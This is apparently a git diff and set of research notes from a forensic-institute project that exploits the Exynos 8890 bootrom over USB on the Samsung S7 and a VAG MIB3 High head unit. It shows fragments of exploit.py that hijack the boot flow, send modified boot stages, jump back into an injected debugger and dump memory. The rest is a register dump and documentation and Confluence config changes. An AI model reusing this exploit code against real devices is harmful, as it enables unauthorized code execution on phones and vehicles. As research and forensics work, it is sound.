self.cd.memwrite_region(0x02024000, bl1)
self.usb_write(b"FLSH")
-
+
# auth_bl1()
jump_bl1()
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
self.cd.arch_dbg.state.print_ctx()
root | DEBUG |
- X0 : 0xc00000 | X1 : 0x2069000 | X2 : 0x0 | X3 : 0x2023114 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
- X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
- X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x20200e8 | X20 : 0x0 |
- X21 : 0x80000000 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
- X28 : 0x0 | X29 : 0x2020ed8 | LR/X30 : 0x202419c | SP/X31 : 0x2020ec0
+ X0 : 0xc00000 | X1 : 0x2069000 | X2 : 0x0 | X3 : 0x2023114 | X4 : 0x4 | X5 : 0x0 | X6 : 0x0 |
+ X7 : 0x136c0008 | X8 : 0x2069000 | X9 : 0x0 | X10 : 0x2070000 | X11 : 0x0 | X12 : 0x0 | X13 : 0x0 |
+ X14 : 0xf | X15 : 0x206d000 | X16 : 0x9 | X17 : 0x0 | X18 : 0x1 | X19 : 0x20200e8 | X20 : 0x0 |
+ X21 : 0x80000000 | X22 : 0x0 | X23 : 0x0 | X24 : 0x0 | X25 : 0x0 | X26 : 0x0 | X27 : 0x1 |
+ X28 : 0x0 | X29 : 0x2020ed8 | LR/X30 : 0x202419c | SP/X31 : 0x2020ec0
However this does not fully run bl1, so we will have to dig a bit deeper to see the puropose and when to jump back to the debugger.
diff --git a/documentation/source/conf.py b/documentation/source/conf.py
index 8078cce..2fabbf0 100644
--- a/documentation/source/conf.py
+++ b/documentation/source/conf.py
@@ -5,10 +5,11 @@
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
+import os
-project = 'Samsung'
-copyright = '2024, Eljakim, Jonathan'
-author = 'Eljakim, Jonathan'
+project = 'Samsung S7'
+copyright = '2024, Nederlands Forensisch Instituut'
+author = 'Eljakim Herrewijnen, Jonathan Herrewijnen'
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
@@ -20,6 +21,21 @@ extensions = [ 'myst_parser',
'sphinx_wagtail_theme',
]
+# -- Settings for confluence -------------------------------------------------
+confluence_publish = True # Set to True to publish to confluence
+confluence_space_key = 'DTSPHINX' # E.g., DT_Sphinx
+confluence_server_url = 'https://confluence.dev.holmes.nl/'
+confluence_parent_page = 'Automotive' # E.g., Workshops
+confluence_page_hierarchy = True
+confluence_publish_dryrun = False # Set to False to publish to confluence
+
+# Use token for authentication, from environment variable
+try:
+ confluence_publish_token = os.environ['CONFLUENCE_TOKEN']
+except:
+ confluence_ask_password = True
+ confluence_ask_user = True
+
templates_path = ['_templates']
exclude_patterns = []
diff --git a/documentation/source/index.rst b/documentation/source/index.rst
index 6042cc5..ffa2532 100644
--- a/documentation/source/index.rst
+++ b/documentation/source/index.rst
@@ -3,9 +3,9 @@
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
-Samsung Documentation
-=====================
-Documentation on Samsung devices, currently mainly the Samsung S7.
+Samsung S7 & MIB3 High
+======================
+Documentation on Samsung devices, currently mainly the Samsung S7. Here we're exploiting the Exynos 8890, which is present on both the Samsung S7 and the MIB3 High (VAG).
.. toctree::
:maxdepth: 2
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index ac9e47a..494a4be 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -772,30 +772,25 @@ class ExynosDevice():
print(f'Current EL: {hex(self.cd.arch_dbg.state.CURRENT_EL)}')
# Restore bootflow
+ print(self.cd.arch_dbg.state.print_ctx())
BL33_jump = self.cd.arch_dbg.state.X0
+ BL33_LR = self.cd.arch_dbg.state.LR
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
- # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
+ # self.cd.memwrite_region(0x020200dc, p32(hijacked_fun)
# Disable this to keep access to the debugger after senindg the next stage
self.cd.restore_stack_and_jump(hijacked_fun)
# ==== Stage 5 ====
- #self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
+ # Sends stage 5 (BL33) but returns to debugger after sending.
stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
-
- # Patching
- # stage4_len = len(stage4)
- # patch_len = len(b"USB RECOVERY MODE")
- # patch = b"ELHER HERE" + (b"\x00" * (patch_len - len(b"ELHER HERE")))
- # patch_offset = stage4.find(b"USB RECOVERY MODE")
- # stage4 = stage4[:patch_offset] + patch + stage4[patch_len + patch_offset:]
- # assert len(stage4) == stage4_len, "Invalid stage4 length"
-
self.send_normal_stage(stage4)
self.connect_device()
self.usb_read(0x200) # GiAs
- self.cd.arch_dbg.X0 = BL33_jump
- self.cd.jump_to(0x8f000000)
+
+ self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+ # self.cd.arch_dbg.X0 = BL33_jump
+ self.cd.jump_to(BL33_LR)
# TRYOUT PATCHING BL33
# BL1 is loaded, now authenticate and patch it
@@ -818,10 +813,11 @@ class ExynosDevice():
time.sleep(2)
- # # dump in stages of 100 000 bytes and append to dump
+ # # # dump in stages of 100 000 bytes and append to dump
# dump = b""
# for i in range(0x80000000, 0xf0000000, 0x100000):
# dump += self.cd.memdump_region(i, 0x100000)
+
pass